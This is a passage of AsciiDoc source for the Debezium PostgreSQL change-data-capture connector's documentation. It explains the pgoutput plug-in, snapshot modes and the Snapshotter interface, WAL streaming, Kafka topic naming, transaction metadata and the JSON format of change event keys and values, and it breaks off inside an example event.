link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present, so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the chosen logical decoding output plug-in. It uses PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_], by means of the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_].\nendif::community[]\n\nifdef::product[]\n* `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. This is the only supported logical decoding output plug-in in this {prodname} release. This plug-in is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present, so no additional libraries need to be installed. 
The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the logical decoding output plug-in by using PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_] and the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_].\nendif::product[]\n\nThe connector produces a _change event_ for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nPostgreSQL normally purges write-ahead log (WAL) segments after some period of time. This means that the connector does not have the complete history of all changes that have been made to the database. Therefore, when the PostgreSQL connector first connects to a particular PostgreSQL database, it starts by performing a _consistent snapshot_ of each of the database schemas. After the connector completes the snapshot, it continues streaming changes from the exact point at which the snapshot was made. This way, the connector starts with a consistent view of all of the data, and does not omit any changes that were made while the snapshot was being taken.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the WAL position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the WAL where it last left off. This includes snapshots. If the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n[[postgresql-limitations]]\n[IMPORTANT]\n====\nThe connector relies on and reflects the PostgreSQL logical decoding feature, which has the following limitations:\n\n* Logical decoding does not support DDL changes. This means that the connector is unable to report DDL change events back to consumers.\n* Logical decoding replication slots are supported only on `primary` servers. When there is a cluster of PostgreSQL servers, the connector can run only on the active `primary` server. It cannot run on `hot` or `warm` standby replicas. If the `primary` server fails or is demoted, the connector stops. After the `primary` server has recovered, you can restart the connector. 
If a different PostgreSQL server has been promoted to `primary`, adjust the connector configuration before restarting the connector.\n\n{link-prefix}:{link-postgresql-connector}#postgresql-when-things-go-wrong[Behavior when things go wrong] describes what the connector does when there is a problem.\n====\n\n[IMPORTANT]\n====\n{prodname} currently supports databases with UTF-8 character encoding only.\nWith a single-byte character encoding, it is not possible to correctly process strings that contain extended ASCII code characters.\n====\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-postgresql-connectors-work\n\/\/ Title: How {prodname} PostgreSQL connectors work\n[[how-the-postgresql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} PostgreSQL connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-postgresql-connectors-perform-database-snapshots[]\n* xref:how-debezium-postgresql-connectors-stream-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records[]\n* xref:metadata-in-debezium-postgresql-change-event-records[]\n* xref:debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: creating-debezium-postgresql-user\n\/\/ Title: Security for PostgreSQL connector\n[[postgresql-security]]\n=== Security\n\nTo use the {prodname} connector to stream changes from a PostgreSQL database, the connector must operate with specific privileges in the database.\nAlthough one way to grant the necessary privileges is to provide the user with `superuser` privileges, doing so potentially exposes your PostgreSQL data to unauthorized access.\nRather than granting excessive privileges to the {prodname} user, it is best to create a dedicated {prodname} replication user to which you grant specific privileges.\n\nFor more information about configuring privileges for the {prodname} PostgreSQL user, see xref:postgresql-permissions[Setting up permissions].\nFor more information about PostgreSQL logical replication security, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} PostgreSQL connectors perform database snapshots\n[[postgresql-snapshots]]\n=== Snapshots\n\nMost PostgreSQL servers are configured to not retain the complete history of the database in the WAL segments. This means that the PostgreSQL connector would be unable to see the entire history of the database by reading only the WAL. Consequently, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database. The default behavior for performing a snapshot consists of the following steps. You can change this behavior by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-snapshot-mode[`snapshot.mode` connector configuration property] to a value other than `initial`.\n\n. Start a transaction with a link:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-set-transaction.html[SERIALIZABLE, READ ONLY, DEFERRABLE] isolation level to ensure that subsequent reads in this transaction are against a single consistent version of the data. 
Any changes to the data due to subsequent `INSERT`, `UPDATE`, and `DELETE` operations by other clients are not visible to this transaction.\n. Obtain an `ACCESS SHARE MODE` lock on each of the tables being tracked to ensure that no structural changes can occur to any of the tables while the snapshot is taking place. These locks do not prevent table `INSERT`, `UPDATE`, and `DELETE` operations from taking place during the snapshot.\n+\n_This step is omitted when `snapshot.mode` is set to `exported`, which allows the connector to perform a lock-free snapshot_.\n. Read the current position in the server's transaction log.\n. Scan the database tables and schemas, generate a `READ` event for each row and write that event to the appropriate table-specific Kafka topic.\n. Commit the transaction.\n. Record the successful completion of the snapshot in the connector offsets.\n\nIf the connector fails, is rebalanced, or stops after step 1 begins but before step 6 completes, upon restart the connector begins a new snapshot. After the connector completes its initial snapshot, the PostgreSQL connector continues streaming from the position that it read in step 3. This ensures that the connector does not miss any updates. If the connector stops again for any reason, upon restart, the connector continues streaming changes from where it previously left off.\n\n[WARNING]\n====\nIt is strongly recommended that you configure a PostgreSQL connector to set `snapshot.mode` to `exported`. The `initial`, `initial_only`, and `always` modes can lose a few events while a connector switches from performing the snapshot to streaming change event records when a database is under heavy load.\nThis is a known issue, and the affected snapshot modes will be reworked to use `exported` mode internally (link:https:\/\/issues.redhat.com\/browse\/DBZ-2337[DBZ-2337]).\n====\n\n[id=\"snapshot-mode-settings\"]\n.Settings for `snapshot.mode` connector configuration property\n[cols=\"20%a,80%a\",options=\"header\"]\n|===\n|Setting\n|Description\n\n|`always`\n|The connector always performs a snapshot when it starts. After the snapshot completes, the connector continues streaming changes from step 3 in the above sequence. This mode is useful in these situations: +\n\n* It is known that some WAL segments have been deleted and are no longer available. +\n* After a cluster failure, a new primary has been promoted. The `always` snapshot mode ensures that the connector does not miss any changes that were made after the new primary had been promoted but before the connector was restarted on the new primary.\n\n|`never`\n|The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL.\n\n|`initial_only`\n|The connector performs a database snapshot and stops before streaming any change event records. If the connector had started but did not complete a snapshot before stopping, the connector restarts the snapshot process and stops when the snapshot completes.\n\n|`exported`\n|The connector performs a database snapshot based on the point in time when the replication slot was created. 
This mode is an excellent way to perform a snapshot without taking locks.\n\nifdef::community[]\n|`custom`\n|The `custom` snapshot mode lets you inject your own implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Set the `snapshot.custom.class` configuration property to a class that is on the classpath of your Kafka Connect cluster, or that is included in the JAR if you are using the `EmbeddedEngine`. For more details, see {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n\n|===\n\nifdef::community[]\n[[postgresql-custom-snapshot]]\n=== Custom snapshotter SPI\n\nFor more advanced uses, you can provide an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. This interface allows control over most aspects of how the connector performs snapshots. This includes whether or not to take a snapshot, the options for opening the snapshot transaction, and whether to take locks.\n\nFollowing is the full API for the interface. All built-in snapshot modes implement this interface.\n\n[source,java,indent=0,subs=\"+attributes\"]\n----\n\/**\n * This interface is used to determine details about the snapshot process:\n *\n * Namely:\n * - Should a snapshot occur at all\n * - Should streaming occur\n * - What queries should be used to snapshot\n *\n * While many default snapshot modes are provided with {prodname},\n * a custom implementation of this interface can be provided by the implementor, which\n * can provide more advanced functionality, such as partial snapshots.\n *\n * Implementations must return true for either {@link #shouldSnapshot()} or {@link #shouldStream()}\n * or true for both.\n *\/\n@Incubating\npublic interface Snapshotter {\n\n void init(PostgresConnectorConfig config, OffsetState sourceInfo,\n SlotState slotState);\n\n \/**\n * @return true if the snapshotter should take a snapshot\n *\/\n boolean shouldSnapshot();\n\n \/**\n * @return true if the snapshotter should stream after taking a snapshot\n *\/\n boolean shouldStream();\n\n \/**\n *\n * @return true if streaming should resume from the start of the snapshot\n * transaction, or false for when a connector resumes and takes a snapshot,\n * streaming should resume from where streaming previously left off.\n *\/\n default boolean shouldStreamEventsStartingFromSnapshot() {\n return true;\n }\n\n \/**\n * @return true if when creating a slot, a snapshot should be exported, which\n * can be used as an alternative to taking a lock\n *\/\n default boolean exportSnapshot() {\n return false;\n }\n\n \/**\n * Generate a valid postgres query string for the specified table, or an empty {@link Optional}\n * to skip snapshotting this table (but that table will still be streamed from)\n *\n * @param tableId the table to generate a query for\n * @return a valid query string, or none to skip snapshotting this table\n *\/\n Optional<String> buildSnapshotQuery(TableId tableId);\n\n \/**\n * Returns a new string that sets up the transaction for snapshotting\n *\n * @param newSlotInfo if a new slot was created for snapshotting, this contains information from\n * the `create_replication_slot` command\n *\/\n default String snapshotTransactionIsolationLevelStatement(SlotCreationResult newSlotInfo) {\n \/\/ we're using the same isolation level that pg_backup uses\n return \"SET TRANSACTION ISOLATION LEVEL SERIALIZABLE, READ ONLY, DEFERRABLE;\";\n }\n\n \/**\n * Returns a SQL statement for locking the given tables during snapshotting, if required by 
the specific snapshotter\n * implementation.\n *\/\n default Optional<String> snapshotTableLockingStatement(Duration lockTimeout, Set<TableId> tableIds) {\n String lineSeparator = System.lineSeparator();\n StringBuilder statements = new StringBuilder();\n statements.append(\"SET lock_timeout = \").append(lockTimeout.toMillis()).append(\";\").append(lineSeparator);\n \/\/ we're locking in ACCESS SHARE MODE to avoid concurrent schema changes while we're taking the snapshot\n \/\/ this does not prevent writes to the table, but prevents changes to the table's schema....\n \/\/ DBZ-298 Quoting name in case it has been quoted originally; it doesn't do harm if it hasn't been quoted\n tableIds.forEach(tableId -> statements.append(\"LOCK TABLE \")\n .append(tableId.toDoubleQuotedString())\n .append(\" IN ACCESS SHARE MODE;\")\n .append(lineSeparator));\n return Optional.of(statements.toString());\n }\n\n \/**\n * Lifecycle hook called once the snapshot phase is finished.\n *\/\n default void snapshotCompleted() {\n \/\/ no operation\n }\n}\n----\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-stream-change-event-records\n\/\/ Title: How {prodname} PostgreSQL connectors stream change event records\n[[postgresql-streaming-changes]]\n=== Streaming changes\n\nThe PostgreSQL connector typically spends the vast majority of its time streaming changes from the PostgreSQL server to which it is connected. This mechanism relies on link:https:\/\/www.postgresql.org\/docs\/current\/static\/protocol-replication.html[_PostgreSQL's replication protocol_]. This protocol enables clients to receive changes from the server as they are committed in the server's transaction log at certain positions, which are referred to as Log Sequence Numbers (LSNs).\n\nWhenever the server commits a transaction, a separate server process invokes a callback function from the {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in]. This function processes the changes from the transaction, converts them to a specific format (Protobuf or JSON in the case of the {prodname} plug-ins) and writes them on an output stream, which can then be consumed by clients.\n\nThe {prodname} PostgreSQL connector acts as a PostgreSQL client. When the connector receives changes, it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the LSN of the event. The PostgreSQL connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the PostgreSQL connector, the LSN recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. 
When the connector restarts, it sends a request to the PostgreSQL server to send the events starting just after that position.\n\n[NOTE]\n====\nThe PostgreSQL connector retrieves schema information as part of the events sent by the logical decoding plug-in. However, the connector does not retrieve information about which columns compose the primary key. The connector obtains this information from the JDBC metadata (side channel). If the primary key definition of a table changes (by adding, removing, or renaming primary key columns), there is a tiny period of time when the primary key information from JDBC is not synchronized with the change event that the logical decoding plug-in generates. During this tiny period, a message could be created with an inconsistent key structure. To prevent this inconsistency, update primary key structures as follows:\n\n. Put the database or an application into a read-only mode.\n. Let {prodname} process all remaining events.\n. Stop {prodname}.\n. Update the primary key definition in the relevant table.\n. Put the database or the application into read\/write mode.\n. Restart {prodname}.\n====\n\n[[postgresql-pgoutput]]\n=== PostgreSQL 10+ logical decoding support (`pgoutput`)\n\nAs of PostgreSQL 10, there is a logical replication stream mode called `pgoutput` that is natively supported by PostgreSQL. This means that a {prodname} PostgreSQL connector can consume that replication stream\nwithout the need for additional plug-ins.\nThis is particularly valuable for environments where installation of plug-ins is not supported or not allowed.\n\nSee {link-prefix}:{link-postgresql-connector}#setting-up-postgresql[Setting up PostgreSQL] for more details.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} PostgreSQL change event records\n[[postgresql-topic-names]]\n=== Topic names\n\nThe PostgreSQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._schemaName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _schemaName_ is the name of the database schema where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a PostgreSQL installation that has a `postgres` database and an `inventory` schema that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. The connector would stream records to these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNow suppose that the tables are not part of a specific schema but were created in the default `public` PostgreSQL schema. 
The names of the Kafka topics would be:\n\n* `fulfillment.public.products`\n* `fulfillment.public.products_on_hand`\n* `fulfillment.public.customers`\n* `fulfillment.public.orders`\n\n\/\/ Type: concept\n\/\/ ModuleID: metadata-in-debezium-postgresql-change-event-records\n\/\/ Title: Metadata in {prodname} PostgreSQL change event records\n[[postgresql-meta-information]]\n=== Meta information\n\nIn addition to a {link-prefix}:{link-postgresql-connector}#postgresql-events[_database change event_], each record produced by a PostgreSQL connector contains some metadata. Metadata includes where the event occurred on the server, the name of the source partition and the name of the Kafka topic and partition where the event should go, for example:\n\n[source,json,indent=0]\n----\n \"sourcePartition\": {\n \"server\": \"fulfillment\"\n },\n \"sourceOffset\": {\n \"lsn\": \"24023128\",\n \"txId\": \"555\",\n \"ts_ms\": \"1482918357011\"\n },\n \"kafkaPartition\": null\n----\n\n* `sourcePartition` always defaults to the setting of the `database.server.name` connector configuration property.\n\n* `sourceOffset` contains information about the location of the server where the event occurred:\n\n** `lsn` represents the PostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-pg-lsn.html[Log Sequence Number] or `offset` in the transaction log.\n** `txId` represents the identifier of the server transaction that caused the event.\n** `ts_ms` represents the server time at which the transaction was committed in the form of the number of milliseconds since the epoch.\n* `kafkaPartition` with a setting of `null` means that the connector does not use a specific Kafka partition. The PostgreSQL connector uses only one Kafka Connect partition and it places the generated events into one Kafka partition.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} PostgreSQL connector-generated events that represent transaction boundaries\n[[postgresql-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages. 
For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from a given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"571\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"571\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"s1.a\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"s2.a\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nTransaction events are written to the topic named `_database.server.name_.transaction`.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"571\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} PostgreSQL connector data change events\n[[postgresql-events]]\n== Data change events\n\nThe {prodname} PostgreSQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce them. 
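\n\nFor example, the following is a minimal sketch of Kafka Connect converter settings that cause the JSON converter to emit both the schema and the payload parts; these are standard Kafka Connect options, and the values shown are one possible choice rather than requirements:\n\n[source,properties]\n----\n# Serialize event keys and values as JSON and include the schema in each message\nkey.converter=org.apache.kafka.connect.json.JsonConverter\nkey.converter.schemas.enable=true\nvalue.converter=org.apache.kafka.connect.json.JsonConverter\nvalue.converter.schemas.enable=true\n----\n\n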
If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nThe default behavior is that the connector streams change event records to {link-prefix}:{link-postgresql-connector}#postgresql-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe PostgreSQL connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. 
If there is an invalid character, it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-postgresql-change-events[]\n* xref:about-values-in-debezium-postgresql-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-postgresql-change-events\n\/\/ Title: About keys in {prodname} PostgreSQL change events\n[[postgresql-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created. Alternatively, if the table has `REPLICA IDENTITY` set to `FULL` or `USING INDEX`, there is a field for each unique key constraint.\n\nConsider a `customers` table defined in the `public` database schema and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `PostgreSQL_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"PostgreSQL_server.public.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`PostgreSQL_server.public.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._schema-name_._table-name_.`Key`. In this example: +\n\n* `PostgreSQL_server` is the name of the connector that generated this event. +\n* `public` is the schema that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. 
In this example, the key contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-postgresql-change-events\n\/\/ Title: About values in {prodname} PostgreSQL change events\n[[postgresql-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe value portion of a change event for a change to this table varies according to the `REPLICA IDENTITY` setting and the operation that the event is for.\n\nifdef::product[]\nDetails follow in these sections:\n\n* <<postgresql-replica-identity, Replica identity>>\n* <<postgresql-create-events,_create_ events>>\n* <<postgresql-update-events,_update_ events>>\n* <<postgresql-primary-key-updates, Primary key updates>>\n* <<postgresql-delete-events,_delete_ events>>\n* <<postgresql-tombstone-events, Tombstone events>>\nendif::product[]\n\n\/\/ Type: continue\n[[postgresql-replica-identity]]\n=== Replica identity\n\nlink:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-altertable.html#SQL-CREATETABLE-REPLICA-IDENTITY[REPLICA IDENTITY] is a PostgreSQL-specific table-level setting that determines the amount of information that is available to the logical decoding plug-in for `UPDATE` and `DELETE` events. More specifically, the setting of `REPLICA IDENTITY` controls what (if any) information is available for the previous values of the table columns involved, whenever an `UPDATE` or `DELETE` event occurs.\n\nThere are four possible values for `REPLICA IDENTITY`:\n\n* `DEFAULT` - The default behavior is that `UPDATE` and `DELETE` events contain the previous values for the primary key columns of a table if that table has a primary key. For an `UPDATE` event, only the primary key columns with changed values are present.\n+\nIf a table does not have a primary key, the connector does not emit `UPDATE` or `DELETE` events for that table. For a table without a primary key, the connector emits only _create_ events. 
\n\/\/ Type: continue\n[[postgresql-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"txId\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"xmin\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.postgresql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"PostgreSQL_server.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": 
